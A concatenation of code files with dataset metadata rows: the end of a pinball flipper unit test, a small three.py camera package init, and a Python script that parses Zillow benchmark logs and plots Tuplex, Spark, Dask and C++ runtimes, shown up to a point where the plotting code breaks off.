hold_settings=HoldSettings(power=0.125), recycle=False))
self.machine.settings.set_setting_value("flipper_power", 0.8)
self.advance_time_and_run()
self.machine.default_platform.set_pulse_on_hit_and_enable_and_release_rule = MagicMock()
flipper.enable()
self.assertEqual(1, len(self.machine.default_platform.set_pulse_on_hit_and_enable_and_release_rule.
_mock_call_args_list))
self.machine.default_platform.set_pulse_on_hit_and_enable_and_release_rule.assert_called_once_with(
SwitchSettings(hw_switch=self.machine.switches.s_flipper.hw_switch, invert=False, debounce=False),
DriverSettings(hw_driver=self.machine.coils.c_flipper_main.hw_driver,
pulse_settings=PulseSettings(power=1.0, duration=8),
hold_settings=HoldSettings(power=0.125), recycle=False)
)
self.assertEqual(8, flipper._get_pulse_ms())
def test_sw_flip_and_release(self):
self.machine.coils.c_flipper_main.enable = MagicMock()
self.machine.coils.c_flipper_main.disable = MagicMock()
self.machine.flippers.f_test_single.sw_flip()
self.machine.coils.c_flipper_main.enable.assert_called_once_with()
self.machine.flippers.f_test_single.sw_release()
self.machine.coils.c_flipper_main.disable.assert_called_once_with()
self.machine.coils.c_flipper_main.pulse = MagicMock()
self.machine.coils.c_flipper_main.disable = MagicMock()
self.machine.coils.c_flipper_hold.enable = MagicMock()
self.machine.coils.c_flipper_hold.disable = MagicMock()
self.machine.flippers.f_test_hold_eos.sw_flip()
self.machine.coils.c_flipper_main.pulse.assert_called_once_with()
self.machine.coils.c_flipper_hold.enable.assert_called_once_with()
self.machine.flippers.f_test_hold_eos.sw_release()
self.machine.coils.c_flipper_main.disable.assert_called_once_with()
self.machine.coils.c_flipper_hold.disable.assert_called_once_with()
| 54.649007
| 118
| 0.698982
| 1,021
| 8,252
| 5.287953
| 0.088149
| 0.130395
| 0.065197
| 0.069272
| 0.885349
| 0.877199
| 0.877199
| 0.849972
| 0.818485
| 0.806816
| 0
| 0.012781
| 0.213039
| 8,252
| 150
| 119
| 55.013333
| 0.818602
| 0
| 0
| 0.6
| 0
| 0
| 0.007271
| 0.003514
| 0
| 0
| 0
| 0
| 0.166667
| 1
| 0.058333
| false
| 0
| 0.033333
| 0.025
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b8cad16b3ff305cd7790730775631d31367039bb
| 219
|
py
|
Python
|
three.py/cameras/__init__.py
|
Michael-Pascale/three.py
|
9912f5f850245fb9456a25b6737e12290ae54a2d
|
[
"MIT"
] | 80
|
2019-04-04T13:41:32.000Z
|
2022-01-12T18:40:19.000Z
|
three.py/cameras/__init__.py
|
Michael-Pascale/three.py
|
9912f5f850245fb9456a25b6737e12290ae54a2d
|
[
"MIT"
] | 9
|
2019-04-04T14:43:50.000Z
|
2020-03-29T04:50:53.000Z
|
three.py/cameras/__init__.py
|
Michael-Pascale/three.py
|
9912f5f850245fb9456a25b6737e12290ae54a2d
|
[
"MIT"
] | 17
|
2019-04-04T14:20:42.000Z
|
2022-03-03T16:26:29.000Z
|
from cameras.Camera import *
from cameras.PerspectiveCamera import *
from cameras.OrthographicCamera import *
# shadow camera is an orthographic camera with differently named uniforms
from cameras.ShadowCamera import *
| 36.5
| 73
| 0.835616
| 26
| 219
| 7.038462
| 0.576923
| 0.240437
| 0.185792
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123288
| 219
| 6
| 74
| 36.5
| 0.953125
| 0.324201
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
b8e70277314dc804f524fa67dde4f784d18e4cfd
| 45,587
|
py
|
Python
|
benchmarks/sigmod21-reproducibility/plot_scripts/zillow_plots.py
|
yunzhi-jake/tuplex
|
fc6c1edeabe8a28a5d46c9a3abf9011b3da78197
|
[
"Apache-2.0"
] | 778
|
2021-06-30T03:40:43.000Z
|
2022-03-28T20:40:20.000Z
|
benchmarks/sigmod21-reproducibility/plot_scripts/zillow_plots.py
|
yunzhi-jake/tuplex
|
fc6c1edeabe8a28a5d46c9a3abf9011b3da78197
|
[
"Apache-2.0"
] | 41
|
2021-07-05T17:55:56.000Z
|
2022-03-31T15:27:19.000Z
|
benchmarks/sigmod21-reproducibility/plot_scripts/zillow_plots.py
|
yunzhi-jake/tuplex
|
fc6c1edeabe8a28a5d46c9a3abf9011b3da78197
|
[
"Apache-2.0"
] | 39
|
2021-07-01T02:40:33.000Z
|
2022-03-30T21:46:55.000Z
|
#!/usr/bin/env python
# coding: utf-8
# ## Zillow experiment plots
# this notebook produces all plots necessary for Figure 3 in the final number + numbers for the accompanying text.
# Figure 3, 7 and table3
# In[24]:
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import re
import json
import seaborn as sns
import datetime
from matplotlib.patches import Patch
import matplotlib.patches as mpatches
from matplotlib.lines import Line2D
from matplotlib.path import *
import warnings
warnings.filterwarnings("ignore")
import scipy.constants
rho = scipy.constants.golden
# make nice looking plot
from .paper import *
import logging
adjust_settings()
# In[75]:
def load_zillow_to_df(data_root):
files = os.listdir(data_root)
rows = []
for file in files:
path = os.path.join(data_root, file)
name = file[:file.find('-run')]
# skip compile runs, they should be loaded separately...
if 'compile-run' in file:
continue
try:
if file.endswith('.txt'):
# print(path)
with open(path, 'r') as fp:
lines = fp.readlines()
# skip empty files (means timeout)
if len(lines) == 0:
continue
row = {}
# get run number
run_no = int(path[path.rfind('run-')+4:path.rfind('.txt')])
# CC baseline decode
if 'cc-' in path or 'cpp_' in path:
d = json.loads(lines[-1])
row = {}
row['write'] = d['output'] / 10**9
row['job_time'] = d['total'] / 10**9
if 'load' in d.keys():
row['load'] = d['load'] / 10**9
row['compute'] = d['compute'] / 10 ** 9
else:
row['compute'] = d['transform'] / 10 ** 9
if 'no-preload' in file or 'no_preload' in file:
row['type'] = 'no-preload'
else:
row['type'] = 'preload'
row['framework'] = 'c++'
# hand-measured compile time
# TODO: update!
row['compile'] = 7.529
row['mode'] = 'c++'
# override if compute is available
if 'compute_time' in d.keys():
row['compute'] = d['compute_time']
elif 'scala' in path: # Scala
row['framework'] = 'scala'
row['type'] = 'single-threaded'
row['mode'] = 'scala'
if 'sparksql' in path:
row['framework'] = 'spark'
row['type'] = 'scala-sql'
row['mode'] = 'scala'
# compile times & Co (hand measured)
row['job_time'] = float(re.sub('[^0-9.]*', '', lines[1]))
row['startup_time'] = float(re.sub('[^0-9.]*', '', lines[0]))
# tuplex decode
elif 'tuplex' in path:
try:
d = {}
if 'tuplex' in name:
d = json.loads(list(filter(lambda x: 'startupTime' in x, lines))[0])
else:
d = json.loads(lines[-1].replace("'", '"'))
load_time = 0.
if 'io_load_time' in d.keys():
load_time = d['io_load_time']
if 'io_load' in d.keys():
load_time = d['io_load']
row = {'startup_time' : d['startupTime'], 'job_time':d['jobTime'], "load":load_time}
row['framework'] = 'tuplex'
if '-st' in path or '_st' in path:
row['type'] = 'single-threaded'
elif '-io' in path:
row['type'] = 'cached'
else:
row['type'] = 'multi-threaded'
if 'preload' in path:
row['type'] = row['type'] + '-preload'
if 'nonvo' in path:
row['type'] = row['type'] + '-no-nvo'
#breakdown time extract for tuplex
c = '\n'.join(lines)
pattern = re.compile('load&transform tasks in (\d+.\d+)s')
lt_times = np.array(list(map(float, pattern.findall(c))))
pattern = re.compile('compiled to x86 in (\d+.\d+)s')
cp_times = np.array(list(map(float, pattern.findall(c))))
m = re.search('writing output took (\d+.\d+)s', c)
if m:
w_time = float(m[1])
row['write'] = w_time
lt_time = lt_times.sum()
cp_time = cp_times.sum()
row['compute'] = lt_time
row['compile'] = cp_time
# override if compute is available
if 'compute_time' in d.keys():
row['compute'] = d['compute_time']
except Exception as e:
print(e)
row['mode'] = 'python3'
else:
d = json.loads(lines[-1].replace("'", '"'))
# clean framework
row['framework'] = d['framework']
if 'Spark' in row['framework']:
row['framework'] = 'spark'
if 'dask' in row['framework']:
row['framework'] = 'dask'
if 'pandas' in row['framework']:
row['framework'] = 'pandas'
# override framework for nuitka + cython
if 'nuitka' in path:
row['framework'] = 'nuitka'
if 'cython' in path:
row['framework'] = 'cython'
# clean keys
if 'load_time' in d.keys():
row['load'] = d['load_time']
if 'run_time' in d.keys():
row['compute'] = d['run_time']
if 'write_time' in d.keys():
row['write'] = d['write_time']
if 'nuitka' or 'cython' in path:
# regex extract
m = re.search("compilation via \w+ took: (\d\.\d+)s", '\n'.join(lines))
if m:
row['compile'] = float(m[1])
row['type'] = d['type']
# adjust spark types
if 'RDD dict' in row['type']:
row['type'] = 'dict'
if 'RDD tuple' in row['type']:
row['type'] = 'tuple'
if 'DataFrame' in row['type']:
row['type'] = 'sql'
row['job_time'] = d['job_time']
if 'startup_time' in d.keys():
row['startup_time'] = d['startup_time']
if 'pypy' in path:
row['mode'] = 'pypy3'
else:
row['mode'] = 'python3'
if len(row) > 0:
row['run'] = run_no
rows.append(row)
except Exception as e:
# print('file: {}'.format(file))
# print(type(e))
# print(e)
pass
return pd.DataFrame(rows)
# In[76]:
def load_data(zillow_folder='r5d.8xlarge/zillow'):
df_Z1 = load_zillow_to_df(os.path.join(zillow_folder, 'Z1/'))
df_Z1 = df_Z1[sorted(df_Z1.columns)]
# exclude first, warmup run
df_Z1 = df_Z1[df_Z1['run'] != 1]
df_Z2 = load_zillow_to_df(os.path.join(zillow_folder, 'Z2/'))
df_Z2 = df_Z2[sorted(df_Z2.columns)]
# exclude first, warmup run
df_Z2 = df_Z2[df_Z2['run'] != 1]
df = df_Z1.copy()
subdf = df[df['type'].isin(['single-threaded-preload', 'preload'])]
subdf = subdf.groupby(['framework', 'mode', 'type']).mean().sort_values(by='compute').reset_index()
recs = subdf.to_dict('records')
tuplex_time = recs[1]['job_time'] #note the switch due to how times are measured
cc_time = recs[0]['compute']
logging.info('Zillow Z1:: Tuplex takes {:.2f}s vs. C++ {:.2f}s, i.e. comes within {:.2f}%'.format(tuplex_time, cc_time,
(tuplex_time - cc_time) / tuplex_time * 100))
df = df_Z2.copy()
subdf = df[df['type'].isin(['single-threaded-preload', 'preload'])]
subdf = subdf.groupby(['framework', 'mode', 'type']).mean().sort_values(by='compute').reset_index()
recs = subdf.to_dict('records')
tuplex_time = recs[1]['job_time'] #note the switch due to how times are measured
cc_time = recs[0]['compute']
logging.info('Zillow Z2:: Tuplex takes {:.2f}s vs. C++ {:.2f}s, i.e. comes within {:.2f}%'.format(tuplex_time, cc_time,
(tuplex_time - cc_time) / tuplex_time * 100))
tuplex_time, cc_time
return df_Z1, df_Z2
def table3(df): # use here df_Z1!
# ## Table 3: Cython vs. Nuitka vs. Tuplex
subdf = df[(df['mode'].isin(['python3', 'c++'])) & (df['framework'].isin(['cython', 'tuplex', 'nuitka', 'c++']))]
subdf = subdf[subdf['type'].isin(['single-threaded', 'tuple', 'no-preload'])]
df_mean = subdf.groupby(['framework', 'mode', 'type']).mean().reset_index()
df_mean = df_mean.sort_values(by='compute').reset_index(drop=True)
table3 = df_mean[['framework', 'mode', 'type', 'compile', 'compute']]
logging.info('Table3:\n{}'.format(table3))
# => For the paper, use compile and compute columns
tplx_dict = df_mean[df_mean['framework'] == 'tuplex'].to_dict('records')[0]
tplx_compile, tplx_compute = tplx_dict['compile'], tplx_dict['compute']
min_compile_sp = df_mean[df_mean['framework'] != 'tuplex']['compile'].min() / tplx_compile
max_compile_sp = df_mean[df_mean['framework'] != 'tuplex']['compile'].max() / tplx_compile
min_compute_sp = df_mean[df_mean['framework'] != 'tuplex']['compute'].min() / tplx_compute
max_compute_sp = df_mean[df_mean['framework'] != 'tuplex']['compute'].max() / tplx_compute
logging.info('Tuplex compile speedup: {:.2f}x - {:.2f}x'.format(min_compile_sp, max_compile_sp))
logging.info('Tuplex compute speedup: {:.2f}x - {:.2f}x'.format(min_compute_sp, max_compute_sp))
# Compare this to best CPython result
best_cpython_result = df[df['framework'] == 'python3'].groupby(['framework', 'mode', 'type']) .mean().reset_index().sort_values('compute').head(1)[['framework', 'mode', 'type', 'compute']]
logging.info('Best CPYthon result: {}s'.format(best_cpython_result['compute'].values[0]))
def figure3(df_Z1, df_Z2, output_folder):
# ## Zillow Z1 plots
logging.info('Plotting Z1')
st_fws = ['tuplex', 'cython', 'nuitka', 'python3', 'c++', 'pandas', 'scala']
mt_fws = ['tuplex', 'spark', 'dask']
# which df to use?
df = df_Z1.copy()
# drop tuplex preload
df = df[df['type'] != 'single-threaded-preload']
query_name = 'Z1'
df_st = df[(df['mode'].isin(['python3', 'c++', 'scala'])) & (df['framework'].isin(st_fws))]
df_st = df_st[~df_st['type'].isin(['multi-threaded', 'cached', 'preload'])]
df_st_mu = df_st.groupby(['framework', 'type']).mean().reset_index()
df_st_std = df_st.groupby(['framework', 'type']).std().reset_index()
df_st_tuple = df_st_mu[df_st_mu['type'] == 'tuple'].sort_values(by='job_time').reset_index(drop=True)
df_st_dict = df_st_mu[df_st_mu['type'] == 'dict'].sort_values(by='job_time').reset_index(drop=True)
df_st_rest = df_st_mu[~df_st_mu['type'].isin(['tuple', 'dict'])].sort_values(by='job_time').reset_index(drop=True)
df_st_tuple_std = df_st_std[df_st_std['type'] == 'tuple']
df_st_dict_std = df_st_std[df_st_std['type'] == 'dict']
df_st_rest_std = df_st_std[~df_st_std['type'].isin(['tuple', 'dict'])]
df_st = df[(df['mode'].isin(['python3', 'c++', 'scala'])) & (df['framework'].isin(st_fws))]
df_st = df_st[~df_st['type'].isin(['multi-threaded', 'cached', 'preload'])]
df_st_mu = df_st.groupby(['framework', 'type']).mean().reset_index()
df_st_std = df_st.groupby(['framework', 'type']).std().reset_index()
df_st_tuple = df_st_mu[df_st_mu['type'] == 'tuple'].sort_values(by='job_time').reset_index(drop=True)
df_st_dict = df_st_mu[df_st_mu['type'] == 'dict'].sort_values(by='job_time').reset_index(drop=True)
df_st_rest = df_st_mu[~df_st_mu['type'].isin(['tuple', 'dict'])].sort_values(by='job_time').reset_index(drop=True)
df_st_tuple_std = df_st_std[df_st_std['type'] == 'tuple']
df_st_dict_std = df_st_std[df_st_std['type'] == 'dict']
df_st_rest_std = df_st_std[~df_st_std['type'].isin(['tuple', 'dict'])]
df_mt = df[(df['mode'].isin(['python3', 'c++', 'scala'])) & (df['framework'].isin(mt_fws))]
df_mt = df_mt[~df_mt['type'].isin(['single-threaded', 'cached', 'preload'])]
df_mt_mu = df_mt.groupby(['framework', 'type']).mean().reset_index()
df_mt_std = df_mt.groupby(['framework', 'type']).std().reset_index()
# links: https://stackoverflow.com/questions/14852821/aligning-rotated-xticklabels-with-their-respective-xticks
sf = 1.1
fig, axs = plt.subplots(figsize=(sf * column_width,
sf *column_width / rho*0.65), nrows=1, ncols=2, constrained_layout=True)
rot = 25
mks = 14
w = .8
w2 = w/2
precision = 1
cc_col = [0, 0, 0]
tplx_col = sns.color_palette()[0]
dask_col = np.array(sns.color_palette()[3])
pyspark_col = 1.2 * np.array(sns.color_palette()[2])
pysparksql_col = 0.6 * np.array(pyspark_col)
fsize=30
py_col = pyspark_col
cython_col = [161/255., 67/255., 133/255.]
nuitka_col = [123/255, 88/255, 219/255.]
scala_col = [.6, .6, .6]
axs = list(axs.flat)
ao = 3.5
lim_high = 62
##### SINGLE-THREADED ######
ax = axs[0]
python3_dict_err = np.array([df_st_dict_std[df_st_dict_std['framework'] == 'python3']['job_time']])
python3_tuple_err = np.array([df_st_tuple_std[df_st_tuple_std['framework'] == 'python3']['job_time']])
pandas_err = np.array([df_st_rest_std[df_st_rest_std['framework'] == 'pandas']['job_time']])
tplx_err = np.array([df_st_rest_std[df_st_rest_std['framework'] == 'tuplex']['job_time']])
cc_err = np.array([df_st_rest_std[df_st_rest_std['framework'] == 'c++']['job_time']])
scala_err = np.array([df_st_rest_std[df_st_rest_std['framework'] == 'scala']['job_time']])
plt_bar(ax, 1, df_st_dict[df_st_dict['framework'] == 'python3']['job_time'], w, py_col,
'Python', 'center', precision=precision, yerr=python3_dict_err,fsize=fsize)
plt_bar(ax, 2, df_st_tuple[df_st_tuple['framework'] == 'python3']['job_time'],
w, py_col, 'Python', 'center', above_offset=ao*10, precision=precision, yerr=python3_tuple_err,fsize=fsize)
plt_bar(ax, 0, df_st_rest[df_st_rest['framework'] == 'pandas']['job_time'],
w, dask_col, 'Pandas', 'center', above_offset=ao*10, precision=precision, yerr=pandas_err,fsize=fsize)
plt_bar(ax, 3, df_st_rest[df_st_rest['framework'] == 'tuplex']['job_time'],
w, tplx_col, 'Tuplex', 'above', precision=precision, above_offset=ao*10, yerr=tplx_err,fsize=fsize)
plt_bar(ax, 4, df_st_rest[df_st_rest['framework'] == 'scala']['job_time'],
w, scala_col, 'Scala', 'above', precision=precision, above_offset=ao*10, yerr=scala_err,fsize=fsize)
plt_bar(ax, 5, df_st_rest[df_st_rest['framework'] == 'c++']['job_time'],
w, cc_col, 'C++', 'above', precision=precision, above_offset=ao*10, yerr=cc_err,fsize=fsize)
ax.axvline(3.5, linestyle='--', lw=2,color=[.6,.6,.6])
legend_elements = [ Line2D([0], [0], marker='o', color='w', label='Python ',
markerfacecolor=py_col, markersize=mks),
Line2D([0], [0], marker='o', color='w', label='Pandas',
markerfacecolor=dask_col, markersize=mks),
Line2D([0], [0], pickradius=2, marker='o', color='w', label='Tuplex',
markerfacecolor=tplx_col, markersize=mks),
Line2D([0], [0], marker='o', color='w', label='Scala (man-opt.)',
markerfacecolor=scala_col, markersize=mks),
Line2D([0], [0], pickradius=2, marker='o', color='w', label='C++ (man-opt.)',
markerfacecolor=cc_col, markersize=mks)]
# legend, also valid for Z2
L = ax.legend(handles=legend_elements, loc='upper right', fontsize=15, bbox_to_anchor=(1, 1),
borderaxespad=-.8, handletextpad=0., ncol=2, columnspacing=0)
cols = [py_col, dask_col, tplx_col, scala_col, cc_col]
for i, text in enumerate(L.get_texts()):
text.set_color(cols[i])
ax.set_xticks([0, 1, 2, 3, 4, 5])
ax.set_xticklabels(['Pandas', 'dict', 'tuple', 'Tuplex', 'Scala', 'C++'], rotation=rot)
ax.grid(axis='x')
sns.despine()
ax.set_ylim(0, lim_high * 10)
ax.set_xlim(-.5, 5.5)
ax.set_xlabel('({}a) single-threaded'.format(query_name), fontsize=27, labelpad=15)
ax.set_ylabel('runtime in s', labelpad=10)
##### MULTI-THREADED ######
ax = axs[1]
spark_sql_time = df_mt_mu[(df_mt_mu['framework'] == 'spark') & (df_mt_mu['type'] == 'sql')]['job_time']
spark_tuple_time = df_mt_mu[(df_mt_mu['framework'] == 'spark') & (df_mt_mu['type'] == 'tuple')]['job_time']
spark_dict_time = df_mt_mu[(df_mt_mu['framework'] == 'spark') & (df_mt_mu['type'] == 'dict')]['job_time']
spark_scala_time = df_mt_mu[(df_mt_mu['framework'] == 'spark') & (df_mt_mu['type'] == 'scala-sql')]['job_time']
spark_sql_time_err = np.array([df_mt_std[(df_mt_std['framework'] == 'spark') & (df_mt_std['type'] == 'sql')]['job_time']])
spark_tuple_time_err = np.array([df_mt_std[(df_mt_std['framework'] == 'spark') & (df_mt_std['type'] == 'tuple')]['job_time']])
spark_dict_time_err = np.array([df_mt_std[(df_mt_std['framework'] == 'spark') & (df_mt_std['type'] == 'dict')]['job_time']])
spark_scala_time_err = np.array([df_mt_std[(df_mt_std['framework'] == 'spark') & (df_mt_std['type'] == 'scala-sql')]['job_time']])
plt_bar(ax, 2, spark_dict_time, w, pyspark_col, 'PySpark (dict)', 'center',
precision=precision,yerr=spark_dict_time_err, fsize=fsize)
plt_bar(ax, 3, spark_tuple_time, w, pyspark_col, 'PySpark (tuple)', 'center', precision=precision,
yerr=spark_tuple_time_err, fsize=fsize)
plt_bar(ax, 1, spark_sql_time, w, pysparksql_col, 'PySparkSQL', 'center', precision=precision,
yerr=spark_sql_time_err, fsize=fsize)
dask_time_err = np.array([df_mt_std[df_mt_std['framework'] == 'dask']['job_time']])
tplx_time_err = np.array([df_mt_std[df_mt_std['framework'] == 'tuplex']['job_time']])
plt_bar(ax, 0, df_mt_mu[df_mt_mu['framework'] == 'dask']['job_time'], w, dask_col,
'Dask', 'center', above_offset=ao, precision=precision, yerr=dask_time_err, fsize=fsize)
plt_bar(ax, 4, df_mt_mu[df_mt_mu['framework'] == 'tuplex']['job_time'], w, tplx_col,
'Tuplex', 'above', above_offset=ao, precision=precision, yerr=tplx_time_err, fsize=fsize)
ax.axvline(4.5, linestyle='--', lw=2,color=[.6,.6,.6])
plt_bar(ax, 5, spark_scala_time, w, scala_col,
'Scala', 'center', above_offset=ao, precision=precision, yerr=spark_scala_time_err, fsize=fsize)
legend_elements = [
Line2D([0], [0], marker='o', color='w', label='PySpark',
markerfacecolor=pyspark_col, markersize=mks),
Line2D([0], [0], marker='o', color='w', label='PySpark',
markerfacecolor=pysparksql_col, markersize=mks),
Line2D([0], [0], marker='o', color='w', label='Dask',
markerfacecolor=dask_col, markersize=mks),
Line2D([0], [0], marker='o', color='w', label='Tuplex',
markerfacecolor=tplx_col, markersize=mks),
Line2D([0], [0], marker='o', color='w', label='SparkSQL(Scala)',
markerfacecolor=scala_col, markersize=mks),]
# legend (also valid for Z2)
L = ax.legend(handles=legend_elements, loc='upper right', fontsize=15,
bbox_to_anchor=(1, 1), borderaxespad=-.4, handletextpad=0., ncol=3, columnspacing=0)
cols = [ pyspark_col, pysparksql_col, dask_col, tplx_col, scala_col]
for i, text in enumerate(L.get_texts()):
text.set_color(cols[i])
ax.set_xticks([0, 1, 2, 3, 4, 5])
ax.set_xticklabels(['Dask', 'SQL', 'dict', 'tuple', 'Tuplex', 'Scala'], rotation=rot)
ax.grid(axis='x')
sns.despine()
# ax.set_ylim(0, 245)
ax.set_ylim(0, lim_high)
ax.set_xlim(-.5, 5.5)
ax.set_xlabel('({}b) 16x parallelism'.format(query_name), fontsize=27, labelpad=15)
# ax.set_ylabel('runtime in s', labelpad=-5)
plt.savefig(os.path.join(output_folder, 'figure3_zillow_10G_{}.pdf'.format(query_name)), transparent=True, bbox_inches = 'tight', pad_inches = 0)
# ------------------------------------------------------------------------------------------------------------------------------
# Z2 part
#------------------------------------------------------------------------------------------------------------------------------
# ### Z2:
logging.info('Plotting Z2')
# In[94]:
df = df_Z2.copy()
query_name = 'Z2'
# drop tuplex preload
df = df[df['type'] != 'single-threaded-preload']
# In[95]:
df_st = df[(df['mode'].isin(['python3', 'c++', 'scala'])) & (df['framework'].isin(st_fws))]
df_st = df_st[~df_st['type'].isin(['multi-threaded', 'cached', 'preload'])]
df_st_mu = df_st.groupby(['framework', 'type']).mean().reset_index()
df_st_std = df_st.groupby(['framework', 'type']).std().reset_index()
df_st_tuple = df_st_mu[df_st_mu['type'] == 'tuple'].sort_values(by='job_time').reset_index(drop=True)
df_st_dict = df_st_mu[df_st_mu['type'] == 'dict'].sort_values(by='job_time').reset_index(drop=True)
df_st_rest = df_st_mu[~df_st_mu['type'].isin(['tuple', 'dict'])].sort_values(by='job_time').reset_index(drop=True)
df_st_tuple_std = df_st_std[df_st_std['type'] == 'tuple']
df_st_dict_std = df_st_std[df_st_std['type'] == 'dict']
df_st_rest_std = df_st_std[~df_st_std['type'].isin(['tuple', 'dict'])]
df_st = df[(df['mode'].isin(['python3', 'c++', 'scala'])) & (df['framework'].isin(st_fws))]
df_st = df_st[~df_st['type'].isin(['multi-threaded', 'cached', 'preload'])]
df_st_mu = df_st.groupby(['framework', 'type']).mean().reset_index()
df_st_std = df_st.groupby(['framework', 'type']).std().reset_index()
df_st_tuple = df_st_mu[df_st_mu['type'] == 'tuple'].sort_values(by='job_time').reset_index(drop=True)
df_st_dict = df_st_mu[df_st_mu['type'] == 'dict'].sort_values(by='job_time').reset_index(drop=True)
df_st_rest = df_st_mu[~df_st_mu['type'].isin(['tuple', 'dict'])].sort_values(by='job_time').reset_index(drop=True)
df_st_tuple_std = df_st_std[df_st_std['type'] == 'tuple']
df_st_dict_std = df_st_std[df_st_std['type'] == 'dict']
df_st_rest_std = df_st_std[~df_st_std['type'].isin(['tuple', 'dict'])]
df_mt = df[(df['mode'].isin(['python3', 'c++', 'scala'])) & (df['framework'].isin(mt_fws))]
df_mt = df_mt[~df_mt['type'].isin(['single-threaded', 'cached', 'preload'])]
df_mt_mu = df_mt.groupby(['framework', 'type']).mean().reset_index()
df_mt_std = df_mt.groupby(['framework', 'type']).std().reset_index()
# links: https://stackoverflow.com/questions/14852821/aligning-rotated-xticklabels-with-their-respective-xticks
sf = 1.1
fig, axs = plt.subplots(figsize=(sf * column_width,
sf * column_width / rho * 0.54), nrows=1, ncols=2, constrained_layout=True)
rot = 25
mks = 20
w = .8
w2 = w / 2
precision = 1
cc_col = [0, 0, 0]
tplx_col = sns.color_palette()[0]
dask_col = np.array(sns.color_palette()[3])
pyspark_col = 1.2 * np.array(sns.color_palette()[2])
pysparksql_col = 0.6 * np.array(pyspark_col)
py_col = pyspark_col
cython_col = [161 / 255., 67 / 255., 133 / 255.]
nuitka_col = [123 / 255, 88 / 255, 219 / 255.]
scala_col = [.6, .6, .6]
axs = list(axs.flat)
ao = 2.5 * 650 / 540
##### SINGLE-THREADED ######
ax = axs[0]
python3_dict_err = np.array([df_st_dict_std[df_st_dict_std['framework'] == 'python3']['job_time']])
python3_tuple_err = np.array([df_st_tuple_std[df_st_tuple_std['framework'] == 'python3']['job_time']])
pandas_err = np.array([df_st_rest_std[df_st_rest_std['framework'] == 'pandas']['job_time']])
tplx_err = np.array([df_st_rest_std[df_st_rest_std['framework'] == 'tuplex']['job_time']])
cc_err = np.array([df_st_rest_std[df_st_rest_std['framework'] == 'c++']['job_time']])
scala_err = np.array([df_st_rest_std[df_st_rest_std['framework'] == 'scala']['job_time']])
plt_bar(ax, 1, df_st_dict[df_st_dict['framework'] == 'python3']['job_time'], w, py_col,
'Python', 'center', precision=precision, yerr=python3_dict_err)
plt_bar(ax, 2, df_st_tuple[df_st_tuple['framework'] == 'python3']['job_time'],
w, py_col, 'Python', 'center', above_offset=ao * 10, precision=precision, yerr=python3_tuple_err)
plt_bar(ax, 0, df_st_rest[df_st_rest['framework'] == 'pandas']['job_time'],
w, dask_col, 'Pandas', 'center', above_offset=ao * 10, precision=precision, yerr=pandas_err)
plt_bar(ax, 3, df_st_rest[df_st_rest['framework'] == 'tuplex']['job_time'],
w, tplx_col, 'Tuplex', 'above', precision=precision, above_offset=ao * 10, yerr=tplx_err)
plt_bar(ax, 4, df_st_rest[df_st_rest['framework'] == 'scala']['job_time'],
w, scala_col, 'Scala', 'above', precision=precision, above_offset=ao * 10, yerr=scala_err)
plt_bar(ax, 5, df_st_rest[df_st_rest['framework'] == 'c++']['job_time'],
w, cc_col, 'C++', 'above', precision=precision, above_offset=ao * 10, yerr=cc_err)
ax.axvline(3.5, linestyle='--', lw=2, color=[.6, .6, .6])
legend_elements = [Line2D([0], [0], marker='o', color='w', label='Python ',
markerfacecolor=py_col, markersize=mks),
Line2D([0], [0], marker='o', color='w', label='Pandas',
markerfacecolor=dask_col, markersize=mks),
Line2D([0], [0], pickradius=2, marker='o', color='w', label='Tuplex',
markerfacecolor=tplx_col, markersize=mks),
Line2D([0], [0], marker='o', color='w', label='Scala (hand-opt.)',
markerfacecolor=scala_col, markersize=mks),
Line2D([0], [0], pickradius=2, marker='o', color='w', label='C++ (hand-opt.)',
markerfacecolor=cc_col, markersize=mks)]
ax.set_xticks([0, 1, 2, 3, 4, 5])
ax.set_xticklabels(['Pandas', 'dict', 'tuple', 'Tuplex', 'Scala', 'C++'], rotation=rot)
ax.grid(axis='x')
sns.despine()
ax.set_ylim(0, 650)
ax.set_xlim(-.5, 5.5)
ax.set_xlabel('({}a) single-threaded'.format(query_name), fontsize=27, labelpad=15)
ax.set_ylabel('runtime in s', labelpad=10)
##### MULTI-THREADED ######
ax = axs[1]
spark_sql_time = df_mt_mu[(df_mt_mu['framework'] == 'spark') & (df_mt_mu['type'] == 'sql')]['job_time']
spark_tuple_time = df_mt_mu[(df_mt_mu['framework'] == 'spark') & (df_mt_mu['type'] == 'tuple')]['job_time']
spark_dict_time = df_mt_mu[(df_mt_mu['framework'] == 'spark') & (df_mt_mu['type'] == 'dict')]['job_time']
spark_scala_time = df_mt_mu[(df_mt_mu['framework'] == 'spark') & (df_mt_mu['type'] == 'scala-sql')]['job_time']
spark_sql_time_err = np.array(
[df_mt_std[(df_mt_std['framework'] == 'spark') & (df_mt_std['type'] == 'sql')]['job_time']])
spark_tuple_time_err = np.array(
[df_mt_std[(df_mt_std['framework'] == 'spark') & (df_mt_std['type'] == 'tuple')]['job_time']])
spark_dict_time_err = np.array(
[df_mt_std[(df_mt_std['framework'] == 'spark') & (df_mt_std['type'] == 'dict')]['job_time']])
spark_scala_time_err = np.array(
[df_mt_std[(df_mt_std['framework'] == 'spark') & (df_mt_std['type'] == 'scala-sql')]['job_time']])
plt_bar(ax, 2, spark_dict_time, w, pyspark_col, 'PySpark (dict)', 'center', precision=precision,
yerr=spark_dict_time_err)
plt_bar(ax, 3, spark_tuple_time, w, pyspark_col, 'PySpark (tuple)', 'center', precision=precision,
yerr=spark_tuple_time_err)
plt_bar(ax, 1, spark_sql_time, w, pysparksql_col, 'PySparkSQL', 'center', precision=precision,
yerr=spark_sql_time_err)
